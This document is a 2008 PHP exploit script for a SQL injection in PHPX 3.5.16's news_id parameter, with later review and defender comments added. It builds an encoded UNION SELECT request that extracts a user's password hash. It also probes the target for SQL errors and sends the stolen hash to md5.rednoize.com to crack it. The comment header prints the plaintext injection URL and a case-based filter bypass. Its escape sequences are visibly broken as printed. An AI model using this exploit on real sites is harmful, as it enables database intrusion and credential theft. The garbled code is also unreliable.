
# Title : PHPX 3.5.16 (news_id) Remote SQL Injection Exploit
# Published : 2008-11-05
# Author : StAkeR


<?php

// Runtime setup for a command-line script: silence every PHP diagnostic, set a
// 5-second default socket timeout, and lift the execution time limit.
// error_reporting(0) also hides the notices and warnings the code below would
// otherwise raise (e.g. appending to variables that were never initialised).
error_reporting(0);
ini_set("default_socket_timeout",5);
set_time_limit(0);



/*
   ---------------------------------------------------
   PHP X 3.5.16 (news_id) Remote SQL Injection Exploit
   ---------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   Download On http://www.phpx.org/project.php
   NOTE: requires magic_quotes_gpc = Off on the target
   ---------------------------------------------------
   
   File (admin/includes/news.inc.php)
   
   1. <?php
   2. #$Id: news.inc.php,v 1.46 2006/12/18 05:51:47 ryan Exp $
   3.
   4.
   5. class newsModule{
   6.
   7. function newsModule(){
   8.
   9.
  10.
  11. $this->action = $_GET['action'];
  12. $this->news_id = $_GET['news_id'];
  13.
  14. global $userinfo;
  15. global $core;
  16.
  17. $this->core = $core;
  18.
  19. $this->userinfo = $userinfo;
  20.
  21.
  22.
  23.
  24. if (!$this->userinfo){ DIE("HACK ATTEMPT"); }
  25. if ($this->userinfo[news] != 1){ DIE("NO ACCESS TO THIS MODULE"); }
  26.
  27. include("includes/text.inc.php");
  28. $this->textFun = new textFunctions();
  29. $this->newsCat = $this->core->db->dbCall("news_categories");
  30. if ($this->news_id == ''){ $this->news_id = $_POST['news_id']; }
  31.
  32. switch($this->action){
  33. case "catrss":
  34. $this->catRSS();
  35. break;
      ...
   
   i've found other bugs..:D
  

   news.php?action=view&news_id=1 ' union all select 1,2,username,4,5,password,7,8 from users where user_id=1/*
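   Result? HACKING ATTEMPT... but this filter is not a real fix: it only matches the lower-case keywords, and a keyword blacklist leaves the unvalidated news_id in the query (the parameter needs an integer cast or a bound query parameter)...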
   news.php?action=view&news_id=1 ' UNION ALL SELECT 1,2,username,4,5,password,7,8 from users where user_id=1/*
   
 
  
*/   


// Helper object; the `search` class is declared at the bottom of this file.
$search = new search;


// Argument check: print the usage text and exit when the first argument matches
// the http:// pattern or the second argument is not numeric.
// NOTE(review): as printed, the pattern has unescaped '/' characters inside '/'
// delimiters, which preg_match() rejects (it returns false and raises a warning
// that error_reporting(0) hides). The escaping was presumably lost when this
// page was extracted - confirm against an original copy.
if(preg_match('/http://(.+?)/i',$argv[1]) or !is_numeric($argv[2])) $search->argv();


// The user id is forced to an integer before it is placed in the request.
$uid = intval($argv[2]);
// $host[0] is used below as the host name and $host[1] as the path; only the
// first path segment after the host is kept, deeper segments are ignored.
$host = explode('/',$argv[1]);
// Pre-check (see search::magic): exits unless the target returns an SQL error
// message for a lone quote in news_id.
$search->magic();

// Value sent in the news_id query parameter, with the integer $uid spliced in
// near the end.
// NOTE(review): as printed these are literal "x31x25..." characters; the escape
// backslashes are not present on this page, so the listing does not run as
// shown. The string presumably corresponds to a percent-encoded form of the
// upper-case UNION query quoted in the header comment - confirm against an
// original copy.
// Defender's view: a news_id value on news.php?action=view that is anything
// other than a plain integer is the indicator to look for in web-server logs,
// and an integer cast or bound parameter on news_id is the fix.
$code = "x31x25x32x30x25x32x37x25x32".
        "x30x55x4Ex49x4Fx4Ex25x32x30".
        "x41x4Cx4Cx25x32x30x53x45x4C".
        "x45x43x54x25x32x30x31x25x32".
        "x43x32x25x32x43x75x73x65x72".
        "x6Ex61x6Dx65x25x32x43x34x25".
        "x32x43x35x25x32x43x70x61x73".
        "x73x77x6Fx72x64x25x32x43x37".
        "x25x32x43x38x25x32x30x66x72".
        "x6Fx6Dx25x32x30x75x73x65x72".
        "x73x25x32x30x77x68x65x72x65".
        "x25x32x30x75x73x65x72x5Fx69".
        "x64x25x33x44".$uid."x25x32x33";
        


// Build the raw HTTP/1.1 GET request for news.php?action=view, carrying $code
// in news_id. $data is appended to without ever being initialised (a notice
// that error_reporting(0) hides).
// The headers are fixed strings, including the User-Agent
// "Mozilla/4.5 [en] (Win95; U)", which makes requests from this script easy to
// pick out in access logs.
// NOTE(review): the "rn" at the end of each line is literal text as printed;
// presumably the CR/LF escapes lost their backslashes in extraction.
$data .= "GET /$host[1]/news.php?action=view&news_id=$code HTTP/1.1rn"; 
$data .= "Host: $host[0]rn";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: en-us,en;q=0.5rn";
$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Connection: closernrn";
    
  
  
// Open a TCP socket to the resolved host on port 80 (plain HTTP, port fixed),
// send the request, and abort with a message if any step fails.
// SO_BROADCAST is set on a SOCK_STREAM socket; the option applies to datagram
// sockets, so it has no useful effect here, but a failure to set it still
// aborts the script.
if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) die("socket_create() error!rn");
if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1)) die("socket_set_option() error!rn"); 
if(!socket_connect($socket,gethostbyname($host[0]),80)) die("socket_connect() error!rn");
if(!socket_write($socket,$data,strlen($data))) die("socket_write() errror!rn");

// Accumulate the response into $content (never initialised beforehand).
// PHP_NORMAL_READ makes each socket_read() stop at a CR or LF; the loop ends on
// the first falsy return value (false or an empty string).
while($html = socket_read($socket,1024,PHP_NORMAL_READ)) 
{ 
  $content .= $html; 
} socket_close($socket);



// Look in the response for "<br><br>" immediately followed by 32 lower-case hex
// digits, i.e. a value with the length of an MD5 digest rendered into the page.
// Defender's view: a digest of this form that can be resolved through a public
// lookup service (see search::md5) suggests the application stores unsalted MD5
// password hashes; a salted, slow hash such as password_hash() is the remedy.
if(preg_match('/<br><br>([0-9a-f]{32})/',$content,$result))
{
  echo "[+] Exploit Successfully!rn";
  echo "[+] Hash: $result[1]rn";
  // Hands the digest to the third-party lookup in search::md5 and prints
  // whatever that returns (nothing when the lookup yields no match).
  echo $search->md5($result[1]);

}
else
{
  // No digest found in the response: report failure and stop.
  echo "[+] Exploit Failed!rn";
  echo "[+] Site Not Vulnerable / ID Not Valid!rn";
  exit;
}

/**
 * Helper routines used by the script above: a hash lookup against a
 * third-party web service, the usage message, and a pre-flight probe of the
 * target. Methods have no declared visibility or types (PHP 4/5-era style).
 */
class search
{
  /**
   * Submit a 32-character hash to md5.rednoize.com over plain HTTP and try to
   * pull the matching plaintext out of the response.
   *
   * Returns a "[+] Password: ..." line when the 20th space-separated token of
   * the response exists, and null (implicitly) otherwise. The token index and
   * the substr() offsets depend on the exact layout of that service's response.
   * Note that the hash is disclosed to the third-party service in the request.
   */
  function md5($hash)
  {
    // Only the length is checked, not that the value is hexadecimal.
    if(strlen($hash) != 32) die("hash not valid!rn");
  
    // $data is appended to without being initialised in this scope.
    $data .= "GET /?p&submit&s=md5&q=$hash&_= HTTP/1.1rn"; 
    $data .= "Host: md5.rednoize.comrn";
    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
    $data .= "Connection: closernrn";
  
    if(!$socket = fsockopen('md5.rednoize.com',80)) die("fsockopen() error!n");  
    if(!fputs($socket,$data)) die("fputs() error!n");


    // Read the whole response (headers and body) into $content.
    while(!feof($socket))
    {
      $content .= fgets($socket);
    } fclose($socket);
  
    $result = explode(' ',$content);
  
    if(isset($result[19]))
    {
      return "[+] Password: ".substr($result[19],20,-6)."rn";
    }
  }
  
  /**
   * Print the usage text and terminate the script.
   *
   * $argv is not imported with `global` here, so $argv[0] inside these strings
   * is an undefined local and interpolates as empty.
   */
  function argv()
  {
    echo "[+] PHP X 3.5.16 (news_id) Remote SQL Injection Exploitrn";
    echo "[+] Usage: php $argv[0] [host/path] [user_id]rn";
    echo "[+] Usage: php $argv[0] localhost/phpx 1rn";
    exit;
  }
  
  /**
   * Pre-flight probe: request news.php?action=view with a lone quote as
   * news_id and check whether the response contains "error in your SQL".
   * If it does not, the script reports "Magic Quotes On" and exits.
   *
   * Defender's view: the probe only works because the application echoes the
   * database error text to the client. Turning off verbose SQL errors removes
   * this signal but not the underlying flaw; news_id still needs an integer
   * cast or a bound query parameter.
   */
  function magic()
  {
    // Reads the host/path array built by the top-level script.
    global $host;
    
    $data .= "GET /$host[1]/news.php?action=view&news_id=' HTTP/1.1rn"; 
    $data .= "Host: $host[0]rn";
    $data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
    $data .= "Connection: closernrn";
  
    if(!$socket = fsockopen($host[0],80)) die("fsockopen() error!n");  
    if(!fputs($socket,$data)) die("fputs() error!n");

    while(!feof($socket))
    {
      $content .= fgets($socket);
    } fclose($socket);
    
    // eregi() is a case-insensitive POSIX regex match; the ereg family was
    // removed in PHP 7.0, so this call fails on current interpreters.
    if(!eregi('error in your SQL',$content))
    {
      echo "[+] Magic Quotes On!rn[+] Exploit Failed!rn";
      exit;
    }
  }
}
